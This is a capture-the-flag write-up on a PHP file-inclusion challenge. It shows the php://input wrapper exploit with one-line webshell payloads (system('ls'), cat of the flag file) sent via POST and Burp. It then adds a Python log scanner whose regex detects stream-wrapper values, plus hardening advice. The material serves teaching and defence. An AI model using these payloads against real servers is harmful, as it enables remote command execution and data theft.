Opening the challenge, I found a hint that there is a phpinfo.php, so I accessed it directly. Nothing special stood out at first, but since the challenge hint points to include, I looked for the allow_url_include setting
(Ctrl+F to search the page directly).
It turns out to be enabled. That allows the php://input form, which is what is used here, with the data sent via POST.
Construct the URL:
http://169c1b893df145ceab40a9f940fab6573f46d3b3eb8d426a.changame.ichunqiu.com/?path=php://input
Use POST to send a one-line webshell as the request body: <?php echo system('ls'); ?>
Running it listed many files.
Then capture the request with Burp Suite (bp), change the one-line webshell to <?php system("cat dle345aae.php"); ?>, resend it in Repeater with Go, and the flag is obtained.
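
From the defender's side, the request above is easy to spot in web server logs, because a parameter that names a file to include carries a stream wrapper. The following is an added example, not part of the original write-up: a small Python scanner over access-log lines in common log format. The log lines, IP addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Stream wrappers that should never appear in a parameter that names a file
# to include (assumption: the scanned parameters are file names, not links).
WRAPPER_RE = re.compile(r"^\s*(php|data|expect|phar|zip|https?|ftp)://", re.I)
# Request part of a common/combined log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (not taken from the challenge server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "POST /?path=php://input HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "POST /?path=PHP%253A%252F%252Finput HTTP/1.1" 200 90',
    '198.51.100.2 - - [01/Jan/2024:10:00:09 +0000] "GET /?path=about.php HTTP/1.1" 200 1024',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding such as php%253A%252F%252Finput."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_wrapper_params(log_line):
    """Return [(method, param, decoded_value)] for wrapper-style values."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    hits = []
    query = urlsplit(match.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = fully_decode(value)
        if WRAPPER_RE.match(decoded):
            hits.append((match.group("method"), name, decoded))
    return hits

def scan(lines):
    """Collect hits from every line; a POST hit on php://input means the
    request body was handed to include() as code."""
    return [hit for line in lines for hit in find_wrapper_params(line)]

if __name__ == "__main__":
    for method, param, value in scan(SAMPLE_LOG):
        print(f"{method} {param}={value}")
```

The underlying fix is on the server: set allow_url_include to Off in php.ini and resolve the path parameter against a fixed allowlist of files instead of passing it to include directly.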